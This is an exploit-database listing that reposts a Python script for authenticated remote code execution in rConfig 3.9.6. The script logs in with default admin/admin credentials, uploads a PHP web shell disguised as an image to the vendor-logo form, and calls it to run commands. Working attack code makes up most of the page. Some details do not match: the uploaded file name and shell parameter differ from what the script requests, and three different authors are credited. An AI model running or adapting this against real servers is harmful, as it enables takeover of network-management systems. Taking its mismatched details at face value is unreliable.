Advertisement






Rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (RCE Authenticated)

CVE Category Price Severity
CVE-2020-10720 CWE-434 $5,000 Critical
Author Risk Exploitation Type Date
bhavsec High Remote 2021-08-18
CPE
cpe:cpe:/a:rconfig:rconfig:3.9.6
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.871 0.98001

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080070

Below is a copy:

Rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (RCE Authenticated)
|===========================================================================
| # Exploit Title : rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (RCE Authenticated)
|                                                                           
| # Author : Ali Seddigh                                                  
|                                                                           
| # Category : Web Application
|
| # Software Link : https://www.rconfig.com/               
|                                                                           
| # Tested on : [ Windows ~> 10 , Kali Linux ]                                                     
|
| # Version : 3.9.6
|                  
| # Date : 2021-06-12                                                       
|===========================================================================

import requests
import sys
s = requests.Session()

host=sys.argv[1] #Enter the hostname
cmd=sys.argv[2]  #Enter the command

def exec_cmd(cmd,host):
    print "[+]Executing command"
    path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
    response=requests.get(path)
    print response.text
    print "\n[+]You can access shell via below path"
    print path

def file_upload(cmd,host):
    print "[+]Bypassing file upload"
    burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
    burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
    burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
    requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
    exec_cmd(cmd,host)


def login(host,cmd):
    print "[+]Logging in"
    burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
    
    burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
    response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
    file_upload(cmd,host)

login(host,cmd)

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.